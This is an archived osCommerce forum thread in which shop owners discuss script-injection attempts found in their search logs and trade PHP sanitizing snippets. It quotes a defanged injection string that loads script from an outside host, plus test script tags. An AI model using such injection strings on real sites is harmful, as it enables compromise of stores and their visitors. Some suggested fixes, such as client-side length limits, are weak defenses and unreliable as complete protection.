ArtcoInc Posted May 18, 2019 Share Posted May 18, 2019 @puggybelle I had an attack on one of my sites yesterday ... I also have a Keyword Search Report on this site. I hadn't checked it in a while, but after reading your post, I went to check it out. Guess what? Same thing here ... That's just part of one page! There are over 20 pages of this! Thank you for reporting this ... I wouldn't have thought to look at this. Malcolm Link to comment Share on other sites More sharing options...
Guest Posted May 19, 2019 Share Posted May 19, 2019 2 hours ago, ArtcoInc said: Thank you for reporting this ... I wouldn't have thought to look at this. What did you check in your database? I really didn't know what else to look at, other than make sure the 'search_queries' table was empty after deleting the report. Then, of course, I put the maxlength limit on the search field here, there and everywhere. Now I'm thinking it should be even shorter than what I assigned. My keyword report resembled yours. I had one entry, though, that was probably eight lines of code alone. Should I check anything else? This stuff always shakes me up. - Andrea Link to comment Share on other sites More sharing options...
pete2007 Posted May 19, 2019 Share Posted May 19, 2019 Is there anyway we can turn off the search queries being saved to our databases? Link to comment Share on other sites More sharing options...
♥JcMagpie Posted May 19, 2019 Share Posted May 19, 2019 1 hour ago, pete2007 said: Is there anyway we can turn off the search queries being saved to our databases? It's not just search, any form on your website that allows the visitor to enter text that is saved to your database is a backdoor for hackers. Search is easy, just remove osC search and replace it with google search nothing saved on your db by this, or limit text input to just on or 2 words. All forms should have some sort of captcha and text cleanser built in to prevent saving scripts to db. Reviews is another one that is targeted by hackers. Link to comment Share on other sites More sharing options...
pete2007 Posted May 19, 2019 Share Posted May 19, 2019 29 minutes ago, JcMagpie said: It's not just search, any form on your website that allows the visitor to enter text that is saved to your database is a backdoor for hackers. Search is easy, just remove osC search and replace it with google search nothing saved on your db by this, or limit text input to just on or 2 words. All forms should have some sort of captcha and text cleanser built in to prevent saving scripts to db. Reviews is another one that is targeted by hackers. Thank you for your reply, where about's can I limit the text for the search? Link to comment Share on other sites More sharing options...
♥JcMagpie Posted May 19, 2019 Share Posted May 19, 2019 As the input filed is controled by function html_output.php we can not control directly. So in the template file of the search simply add a bit of js to limit input. <script> $("input").attr("maxlength", 20) </script> You should let your customers know a limit is set. Link to comment Share on other sites More sharing options...
Jack_mcs Posted May 19, 2019 Share Posted May 19, 2019 @ArtcoIncThe r87 dot com is a site on godaddy. You could report it as a spammer and/or block its IP's. Although the whois for it lists quite a few similar names so I suspect this guy wouldn't be easily stopped. 13 hours ago, puggybelle said: Should I check anything else? This stuff always shakes me up. Limiting the search string probably won't make a difference since they can type directly into the url. Many times the hackers will enter some invalid command so that an error is displayed that gives them more details about the database. You can test your site here to see if that is the case. Also be sure that anything entered in the search does not show up on the page after the search. This doesn't occur with the CE version but might with older versions. If your search doesn't require any special characters, then I suggest you change this code in the advanced_search_result.php file if (isset($_GET['keywords'])) { $keywords = tep_db_prepare_input($_GET['keywords']); } to this if (isset($_GET['keywords'])) { $keywords = preg_replace('/[^\w]/', '', $_GET['keywords']); $keywords = tep_db_prepare_input($keywords); } That will remove everything from the search string other than letters and numbers. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
ArtcoInc Posted May 19, 2019 Share Posted May 19, 2019 @pete2007 11 hours ago, pete2007 said: Is there anyway we can turn off the search queries being saved to our databases? Out of the box, osC does not save search queries in the database. I'm using an add-on called SmartSuggest that, amongst other things, creates a new database table and saves the search queries. I find this important since I can now see what people are searching for, and use that information to either adjust the text on my site, or adjust my product lines (if I sell apples, and people are searching for oranges ... ). M Link to comment Share on other sites More sharing options...
♥JcMagpie Posted May 19, 2019 Share Posted May 19, 2019 A simple string scrubbing function using, https://www.php.net/manual/en/function.preg-replace.php function ScrubInput($input) { // allow only letters //$scrub = preg_replace("/[^a-zA-Z]/", "", $input); // allow only letters and numbers //$scrub = preg_replace("/[^a-zA-Z0-9]/", "", $input); // allow only letters, numbers, and whitespace $scrub = preg_replace("/[^a-zA-Z0-9\s]/", "", $input); // Let's get rid of all CAPS $scrub = strtolower($scrub); // limit input to 40 chars $scrub = substr($scrub, 0, 40); // Let's get rid of all CAPS $scrub = strtolower($scrub); return $scrub; } // test the function echo ScrubInput("iaja this 1237412~! is @#$%^&*() how -=+_] it [{};:/ works .,>?OKAMNBVCXZLKJHG'\""); ?> Result: iaja this 1237412 is how it works ok Link to comment Share on other sites More sharing options...
greasemonkey Posted May 19, 2019 Share Posted May 19, 2019 As a suggestion for a different smart search that doesn’t write to your DB... try this one (I’ve been using it for a couple years... works great). https://apps.oscommerce.com/Redirect=9351 Link to comment Share on other sites More sharing options...
ArtcoInc Posted May 19, 2019 Share Posted May 19, 2019 @greasemonkey (while off topic regarding hack attempts ...) I also reviewed that search add-on here ... M Link to comment Share on other sites More sharing options...
greasemonkey Posted May 19, 2019 Share Posted May 19, 2019 @ArtcoInc I think the link to your review is very relevant to the thread - and the threat of this hack attempt (I can’t recall the level of detail in your review but maybe you’d update to include this potential risk). Link to comment Share on other sites More sharing options...
Guest Posted May 19, 2019 Share Posted May 19, 2019 @Jack_mcs @JcMagpie Any way to keep apostrophes, quotation marks, dashes, letters and numbers? LOL. My buyers really need to use quotation marks in some circumstances, in order to find the exact name or phrase. When the edits are made, you can't even find the test product A Bug's Life unless you leave out the apostrophe. Smart buyers are going to include the apostrophe...get no search results...and leave. These edits are only making search more difficult. And after viewing my keywords search report for months now....buyers need all the help they can get! Is there a way to sanitize against the inclusion of weird characters that always accompany a malicious code string, but preserve the other ones I mentioned? - Andrea Link to comment Share on other sites More sharing options...
MrPhil Posted May 19, 2019 Share Posted May 19, 2019 It will depend on your osCommerce version, and what add-ons you have that put stuff to database, but any decent DB code should disable (usually escape, not removal) any special characters that might be interpreted as database commands. That way, the string content can't be used to run commands, but it still might interfere with searches. For example, escaping an apostrophe so that it can't be used to end a field and add SQL commands (change it to a literal apostrophe, not a delimiter for SQL commands), might prevent searching for "A Bug's Life", but I'm not sure in this code. I haven't looked lately, but there may be ways around that problem. Link to comment Share on other sites More sharing options...
♥JcMagpie Posted May 19, 2019 Share Posted May 19, 2019 just put the chars you want to not remove in the [] and you be fine , see i have added ' and - after the 9 $scrub = preg_replace("/[^a-zA-Z0-9'-\w\ ]/", "", $input); this will give Result: iaja'-'- this 1237412 is @^*() how -=+_ from echo ScrubInput("iaja'-'- this 1237412~! is @#$%^&*() how -=+_] it [{};:/ works .,>?OKAMNBVCXZLKJHG'\""); Please check before using on live site. only tested in sandbox. Link to comment Share on other sites More sharing options...
Jack_mcs Posted May 20, 2019 Share Posted May 20, 2019 6 hours ago, puggybelle said: Any way to keep apostrophes, quotation marks, dashes, letters and numbers? LOL. For the code I posted, use $keywords = preg_replace('/[^ \w-\'\"]/', '', $_GET['keywords']); Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
♥JcMagpie Posted May 20, 2019 Share Posted May 20, 2019 14 hours ago, puggybelle said: When the edits are made, you can't even find the test product A Bug's Life unless you leave out the apostrophe. I don't think this has anything to do with the edits as on a stock osC you still will get no results! Try your self on a clean BS4 in stall https://www.jcmagpie.com/advanced_search_result.php?keywords=A+Bugs+Life Compare that to a google search box output and you get a result every time, try it your self. https://www.justfastfood.com/ Link to comment Share on other sites More sharing options...
♥JcMagpie Posted May 20, 2019 Share Posted May 20, 2019 Just checked on official osC and it's the same result nothing found, can you spot the irony of the image below? Link to comment Share on other sites More sharing options...
MrPhil Posted May 20, 2019 Share Posted May 20, 2019 Well, you could always replace your osC search with Google (with the term site:yoursite.com) or some other well-known search engine. (Are there any others left these days?) You will likely lose any storage of search terms, although there's no reason you couldn't save a search string (suitably sanitized, first) in your database before passing it on to Google. I'm assuming that there is no problem with sessions, etc. if you pop out to an external search engine from a logged-in store, so check out that early in the process. Link to comment Share on other sites More sharing options...
♥JcMagpie Posted May 20, 2019 Share Posted May 20, 2019 On 1/8/2019 at 6:00 PM, puggybelle said: Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC So going back to the original post of what if some one uses a form to inject script into the db? Look's like no cleaning is done before input is saved to db in official osC or CE. Script used in create account form is simply passed over to each page and saved into db. No scrubing is done when it is pulled out to display, And db is just taking the data presented to it. The test script used was the one origionaly posted and used as a test ( can do no harm as it not active on it's own) Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC So looks like some method of scrubing all forms and input boxes is needed not just the search. Or have I missed somthing? Link to comment Share on other sites More sharing options...
♥raiwa Posted May 20, 2019 Share Posted May 20, 2019 malicious/problematic code has already been filtered out in this example: Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC 244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_ About Me: http://www.oscommerce.com/forums/user/249059-raiwa/ Need help? How To Get The Help You Need Is your version of osC up to date? You'll find the latest osC community version CE Phoenix here. Public Phoenix Change Log Cheat Set on Google Sheets Link to comment Share on other sites More sharing options...
greasemonkey Posted May 20, 2019 Share Posted May 20, 2019 @raiwa is this cleaned by tep_draw_input_field (which is sanitizing with stripslashes)? And if so... is it enough? This is definitely out of my skill range - it really is just a question. Reading about SQL injections (again I'm not sure I understand it clearly) should we not be using PDO (as in 2.4) or at minimum htmlspecialchars? Source: https://stackoverflow.com/questions/29678806/secure-all-inputs-in-php-form Link to comment Share on other sites More sharing options...
puddlec Posted May 20, 2019 Share Posted May 20, 2019 how would it handle stuff like <script src="google.com"> and <script src="google.com"> Phoenix support now at https://phoenixcart.org/forum/ App created for phoenixTinyMCE editor for admin Link to comment Share on other sites More sharing options...
♥JcMagpie Posted May 20, 2019 Share Posted May 20, 2019 Both blocked by server with 403 error page. Link to comment Share on other sites More sharing options...
♥raiwa Posted May 20, 2019 Share Posted May 20, 2019 45 minutes ago, greasemonkey said: @raiwa is this cleaned by tep_draw_input_field (which is sanitizing with stripslashes)? And if so... is it enough? This is definitely out of my skill range - it really is just a question. Reading about SQL injections (again I'm not sure I understand it clearly) should we not be using PDO (as in 2.4) or at minimum htmlspecialchars? Source: https://stackoverflow.com/questions/29678806/secure-all-inputs-in-php-form I guess this input example has been cleaned with: tep_db_prepare_input: function tep_db_prepare_input($string) { if (is_string($string)) { return trim(tep_sanitize_string(stripslashes($string))); } elseif (is_array($string)) { foreach($string as $key => $value) { $string[$key] = tep_db_prepare_input($value); } return $string; } else { return $string; } } which uses tep_sanitize_string: function tep_sanitize_string($string) { $patterns = array ('/ +/','/[<>]/'); $replace = array (' ', '_'); return preg_replace($patterns, $replace, trim($string)); } If it is enough I do not know neither. About Me: http://www.oscommerce.com/forums/user/249059-raiwa/ Need help? How To Get The Help You Need Is your version of osC up to date? You'll find the latest osC community version CE Phoenix here. Public Phoenix Change Log Cheat Set on Google Sheets Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.